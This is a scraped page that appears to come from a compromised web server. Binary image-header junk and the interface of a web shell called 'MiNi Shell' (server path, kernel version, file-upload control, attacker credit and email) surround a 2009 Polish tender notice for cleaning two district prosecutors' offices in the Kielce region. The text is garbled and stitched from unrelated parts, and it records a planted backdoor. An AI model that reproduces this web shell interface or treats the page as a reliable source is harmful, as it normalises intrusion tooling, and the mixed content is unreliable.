JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23218-N-2009.html

<p class="kh_header"><b>Kielce: Świadczenie usługi sprzątania w budynkach Prokuratur Rejonowych w Ostrowcu Świętokrzyskim oraz Pińczowie Ośrodek Zamiejscowy w Kazimierzy Wielkiej</b><br>
<b>Numer ogłoszenia: 23218 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Kielcach , ul. Mickiewicza 7, 25-352 Kielce, woj. świętokrzyskie, tel. 041 3649941, 3649974, faks 041 3649994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prokuratura.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi sprzątania w budynkach Prokuratur Rejonowych w Ostrowcu Świętokrzyskim oraz Pińczowie Ośrodek Zamiejscowy w Kazimierzy Wielkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest kompleksowe sprzątanie pomieszczeń biuro-wych, eksploatacyjnych, gościnnych, dróg komunikacyjnych w budynku Prokuratury Re-jonowej w:
- Prokuratury Rejonowej w Ostrowcu Świętokrzyskim przy ul. Wardyńskiego 15 C.
- Prokuratury Rejonowej w Pińczowie Ośrodek Zamiejscowy w Kazimierzy Wielkiej  przy ul. Reja 17.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-2, 90.61.00.00-6, 77.31.41.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Każdy wykonawca zgodnie z wymogiem art. 22 ust. 1 ustawy winien:
a- posiadać uprawnienia do wykonywania określonej działalności objętej przedmiotem zamó-wienia,
b- Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym, a także osobami zdolnymi  do wykonania zamówienia lub przedstawić pisemne zobowiazanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
   c- znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
          zamówienia,
   d- nie podlegać wykluczeniu z postępowania o udzielenie zamówienia z tytułu
           przesłanek wymienionych w art. 24 ust. 1 i ust. 2 ustawy, 
2 WARUNKI SZCZEGÓŁOWE:

2.1. Potencjał ekonomiczno - finansowy:
         
            Wykonawca musi wykazać:

2.1.1.  że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej dzia-łalności gospodarczej, z odpowiedzialnością deliktową w wysokości nie mniejszej niż 
30 000 zł

2.1.2.   wyrażą zgodę na termin płatności faktur za danym miesiąc usługi do 30 dni.

W przypadku umowy wspólnego wykonania zamówienia, wymóg ten musi zostać spełniony przez wszystkie strony tej umowy.

2.2. Doświadczenie - zdolność zawodowa:

      Wykonawca musi wykazać:

2.2.1. że w okresie ostatnich trzech lat wykonał nie mniej niż dwa zamówienia w zakresie sprzą-tania obiektów biurowych o powierzchni co najmniej jak przedmiot zamówienia oraz o porówny-walnym charakterze i złożoności do niniejszego zamówienia.
 
2.3. Potencjał kadrowy

Wykonawca musi wykazać:

2.3.1 że dla wykonania niniejszego zamówienia posiada personel posiadający odpowiednie kwalifikacje. Pracownicy wykonawcy, którzy wykonywać będą czynności bezpośrednio w obiekcie prokuratury, winni spełniać wymóg uzyskania zaświadczenia z Krajowego Rejestru Karnego Pt. Zapytanie o udzielenie informacji o osobie - zaświadczenie należy przedstawić do wglądu przed podpisaniem umowy. Do oferty należy załączyć oświadczenie o dostarczeniu powyższego zaświadczenia w dniu podpisania umowy oraz oświadczenia iż osoby przeznaczone do wykonania zadania posiadają odpowiednie kwalifikacje i doświadczenie do wykonanie powyższych prac.

2.4. Potencjał techniczny:

Wykonawca musi dysponować niezbędnymi do wykonania zamówienia narzędziami i urządze-niami, a sprzęt będzie odpowiedni do wykonania zamówienia ( kontraktu)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu Wykonawcy winni przedłożyć do oferty niżej wy?mienione dokumenty:

1.1.) oświadczenie na treść art. 22 ust.1 z mocy art. 44 ustawy - na formularzu zgod?nym z treścią załącznika nr 1 do Instrukcji dla Wykonaw?ców,

1.2.) aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej. Dokument ten ma stwier?dzać stan prawny Wykonawcy, zakres jego działalności stwierdza?jący, że Wykonawca prowadzi działalność gospodarczą o profilu odpo-wiada?jącym zamó?wieniu, osoby uprawnione do składania oświadczeń woli w za?kresie praw i obowiązków majątkowych - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Uwaga:
W przypadku prowadzenia działalności w formie spółki cywilnej i przedłożenia do oferty za-świadczenia o wpisie do ewidencji działalności gospodarczej należy do tego dokumentu założyć umowę spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób reprezen-towania spółki ( składania oświadczeń woli).
1.3.)  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia załączają do oferty pełno-mocnictwo dla przedstawiciela występującego w imieniu wykonawców składających ofertę wspólną, które winno obejmować:
-    dokładne określenie stron udzielających pełnomocnictwa i ich upełnomocnionych przedsta-wicieli,
- wskazanie pełnomocnika do reprezentowania wykonawców składających ofertę wspólną do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, którym winien być wiodący podmiot ( zwany liderem) wraz z zakresem jego uprawnień do takiej repre-zentacji - określenie czynności prawnych i faktycznych,
  
1.4.)    Pełnomocnictwo imienne do podpisania oferty w innych przypadku niż wymienionym w powyższym ppkt. 1.3 - w formie oryginału, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. W pełnomocnictwie tym należy także określić upraw-nienie do po?świadczenia za zgodność z oryginałem wszystkich kopii dokumentów składanych wraz z ofertą. Pełnomocnictwo w formie oryginału winno być udzielone przez osoby  Wykonawcy składającego ofertę uprawnione do składania oświadczeń woli, ujawnione w doku-mencie, o którym mowa w powyższym ppkt. 1.1. Pełnomoc?nictwo musi być spełniać wymagania wynikające z postanowień ustawy z o opłacie skarbo?wej oraz przepisu wykonawczego w sprawie pobierania, zapłaty i zwrotu opłaty skarbowej oraz sposobu prowadzenia rejestrów tej opłaty.

1.5.) W przypadku, kiedy Wykonawca prowadzi działalność gospodarczą w formie spółki z ograniczoną odpowiedzialności, a z odpisu właściwego rejestru nie wynika prawo do złożenia oferty cenowej przekraczającej dwukrotną wartość kapitału spółki, winien złożyć do oferty kopię uchwały wspólników w tym zakresie stosownie do art.230 Kodeksu Spółek Handlowych,

1.6.) Aktualne zaświadczenia z właściwego naczelnika urzędu skarbowego, oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecz?nego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

1.7.) Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie wła-ściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określo-nym w art. 24 ust.1 pkt 4 - 8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem składania ofert, 

1.8.) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem składania ofert.

1.9.) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypo?spolitej Polskiej, zamiast dokumentów, o których mowa w powyższych pkt. 1.2., 1.6., 1.8. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1.	Nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2.	Nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3.	Nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego or-ganu.

1.10.) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyższym pkt. 1.9. oraz w pkt. 1.7, zastępuje się je dokumentem zawierającym oświadczenie złożone przed no-tariuszem, właściwym organem sądowym, administracyjnym albo organem samo?rządu za-wodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

1.11.) Dokumenty wymienione w powyższym pkt. 1.9.i 1.10., przedkłada się do oferty w for-mie oryginału, odpisu, wypisu, wyciągu lub kopii, wraz z tłumaczeniem na język polski po-świadczonym przez polskie placówki konsularne lub dokonanego przez tłumacza przysięgłe-go. Także pozostałe załączone do oferty dokumenty sporządzone w innym języku niż w pol-skim stosownie do wymogów art. 9 ust. 2 ustawy prawo zamówień publicznych winny zawie-rać tłumaczenie dokonane przez tłumacza przysięgłego.

2.	Dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu okre-ślonych w pkt. 2.1. roz?działu IV niniejszej Instrukcji(Potencjał ekonomiczno - finansowy), Wykonawcy winni przedłożyć do oferty niżej wymienione dokumenty:

2.1.) Polisę lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubez-pieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 30 tys. zł.

2.2) Oświadczenie złożone w ofercie, ze Wykonawca wyraża zgodę na terminy płatności fak-tur do 30 dni.
 
3.	Dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu okre-ślonych w pkt. 2.2. roz?działu IV niniejszej Instrukcji(Doświadczenie - zdolność zawodo-wa), Wykonawcy winni przedłożyć do oferty niżej wymienione dokumenty:

3.1.) Wykazu wykonanych w okresie ostatnich co najmniej dwóch usług w zakresie sprząta-nia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, od?powiadających swoim rodzajem i wartością usług stanowiącym przedmiot zamówienia, z podaniem ich war-tości oraz daty i miejsca wykonania na formularzu zgod?nym z treścią załącznika nr 6 do Instrukcji dla Wykonawców. Treść zawarta w wykazie winna potwierdzać spełnienie warunku, o którym mowa w pkt. 2.2.1. niniejszej In?strukcji dla Wykonawców. 

3.3.) Dla każdej z wymienionej usługi ( zamówienia) w wykazie, o których mowa w pkt. 3.1 na?leży załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie. 

4.	Dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu okre-ślonych w pkt. 2.3. roz?działu IV niniejszej Instrukcji(Potencjał kadrowy), Wykonawcy winni przedłożyć do oferty niżej wymienione dokumenty:

4.1.) Informację na temat przeciętnej liczby zatrudnionych pracowników w firmie Wykonawcy  na formularzu zgodnym z treścią załącznika nr 7 do In?strukcji dla Wykonawców. W przy-padku składania oferty wspólnej dotyczy to wszystkich Wykonawców ubiegających się wspólnie o zamówienie, a informacja w tym zakresie winna być przedłożona w formie do-datkowego dokumentu do ww załącznika.  
   
4.2.) Wykaz osób z podaniem ilości osób przewidzianych do wykonywania bezpośredniej czynności sprzątania ( bez podania nazwisk), które są przewidziane do wykonywania za-mówienia lub będą uczestniczyć w wykonywaniu zamówienia, z podaniem zakresu wykony-wanych przez nich czynności na formularzu zgodnym z treścią załącznika 7 do Instrukcji dla Wykonawców. W odniesieniu do tych osób treść wykazu musi zawierać dane na temat spełnienia wymagań Zamawiającego wymienionych w pkt. 2.3.1. roz?działu IV niniejszej Instrukcji, tj. potwierdzić, że osoby w nim wymienione spełniać będą warunki, o których mowa w pkt. 2.3.1. rozdziału IV Instrukcji dla Wykonawców. Osoby przeznaczone do bezpośredniego wykonania zadania winny zamieszkiwać w odległości zapewniającej, w razie wystąpienia takiej konieczności, przybycie w ciągu jednej godziny do siedzib Prokuratur Rejonowych.

5.	Dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu okre-ślonych w pkt. 2.4. roz?działu IV niniejszej Instrukcji (Potencjał techniczny - załącznik nr 8), Wykonawcy winni przedłożyć do oferty niżej wymienione dokumenty:

5.1.) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada Wy-konawca stanowiący informację o dysponowaniu sprzętem (Potencjał techniczny) oraz dokładny opis z podaniem nazwy handlowej środków chemii gospodarczej i środków higienicznych przewidzianych do wykorzystania dla wykonywania zamówienia. 


1.	W celu potwierdzenia spełnienia warunków ogólnych od Wykonawców składających wspólną ofertę dokumenty wymienione w niniejszym rozdziale w pkt. 1.1. - 1.2. i 1.5. - 1.8. składa, każdy Wykonawca, zaś dokumenty wymienione w pkt. 1.3. przedkłada-ne są w imieniu wszystkich wykonawców. 

2.	W celu potwierdzenia spełnienia warunków szczegółowych od Wykonawców składa-jących wspólną ofertę dokumenty wymienione w niniejszym rozdziale w punktach 2 - 6 winien przedłożyć do oferty w imieniu wszystkich, ten lub ci spośród Wykonawców ubiegających się wspólnie o zamówienie, w stosunku, do których w Instrukcji dla Wy-konawców, o których mowa w pkt. 1.3 niniejszego rozdziału) wymaga potwierdzenia spełnienia warunku.

3.	Dokumenty wymienione w niniejszym rozdziale w punktach 1 - 6 winny być złożone jako załączniki do oferty w terminie składania ofert.

4.	Dokument wymieniony w niniejszym rozdziale objęte punktami:
- 1 -  pkt. 1.1, 1.3, 1.4,
- 2  - pkt.. 3.1,
- 3 -  pkt. 4.1,
- 4 - pkt. 5.1,
- 5 - pkt. 6,1
 ( z zastrzeżeniem wynikającym z pkt. 1.10 i 1.11) przedkłada się do oferty w formie oryginału. Pozostałe zaś dokumenty wymienione punktach 1-6 niniejszego rozdziału Wy?konawca winien złożyć do oferty do jako oryginały lub kopie poświadczonej przez Wyko?nawcę za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.prokuratura.kielce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Kielcach
ul. Mickiewicza 7
25-352 Kielce
pok.nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: Prokuratura Okręgowa w Kielcach
ul. Mickiewicza 7
25-352 Kielce
pok. nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzatanie Prokuratury Rejonowej w Ostrowcu Świętokrzyskim przy ul. Wardyńskiego 15 C.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zamó?wienia w zakresie kompleksowego sprzątania polegać będzie na wy?konywaniu:
 Dla Prokuratury Rejonowej w Ostrowcu Świętokrzyskim:
a. sprzątania codziennego w każdym dniu roboczym:

- wszystkich pomieszczeń: biurowych, socjalnych, gościnnych, sanita?riatów, korytarzy, (wykła-dzina PCV 190 m2, wykładzina dywanowa 390 m2, glazura i terakota 120 m2)
- zamiatanie i odśnieżanie chodnika, drogi dojazdowej i parkingu za budynkiem 300 m2 oraz trawnika (100 m2) wraz z jego koszeniem.

b. sprzątanie wraz z myciem w miarę potrzeb, nie rzadziej niż:

1 raz w tygodniu: piwnica (gres 90 m2), garaż (gres 44 m2), 

2 razy w tygodniu: drzwi wejściowe oszklone 13 m2

2 raz w miesiącu: drzwi (pełne 70szt.), parapetów zewnętrznych okien, archiwum 53 m2

4 razy w roku w terminach uzgodnionych z Zamawiającym:
- okien z zewnątrz i wewnątrz (powierzchnia 116 m2),
- czyszczenie ( pranie ) wykładzin dywanowych (390 m2), 

c. zabezpieczenie toalet w papier toaletowy (z wyłączeniem papieru w kolorze szarym), ręcz-niki papierowe i mydło w płynie oraz w środki dezynfekujące i zapachowe w tym także w pa-larni.

Liczba pracowników: 30 osób..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-2, 90.61.00.00-6, 77.31.41.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzatanie Prokuratury Rejonowej w Pińczowie Ośrodek Zamiejscowy w Kazi-mierzy Wielkiej  przy ul. Reja 17.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zamó?wienia w zakresie kompleksowego sprzątania polegać będzie na wy?kony-waniu:
Dla Prokuratury Rejonowej w Pińczowie Ośrodek Zamiejscowy w Kazimierzy Wielkiej:
a. sprzątania codziennego w każdym dniu roboczym:

- wszystkich pomieszczeń: biurowych, socjalnych, gościnnych, sanita?riatów, korytarzy, (wykła-dzina PCV 12 m2, wykładzina dywanowa 144 m2, glazura i terakota 26 m2)

b. sprzątanie wraz z myciem w miarę potrzeb, nie rzadziej niż:

2 razy w tygodniu: drzwi wejściowe oszklone 4,40 m2

2 raz w miesiącu: drzwi (pełne 10szt.), parapetów zewnętrznych okien, archiwum 31,20 m2

4 razy w roku w terminach uzgodnionych z Zamawiającym:
- okien z zewnątrz i wewnątrz (powierzchnia 44 m2),
- czyszczenie ( pranie ) wykładzin dywanowych (144 m2), 

c. zabezpieczenie toalet w papier toaletowy (z wyłączeniem papieru w kolorze szarym), ręcz-niki papierowe i mydło w płynie oraz w środki dezynfekujące i zapachowe w tym także w pa-larni.

Liczba pracowników: 10 osób..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-2, 90.61.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com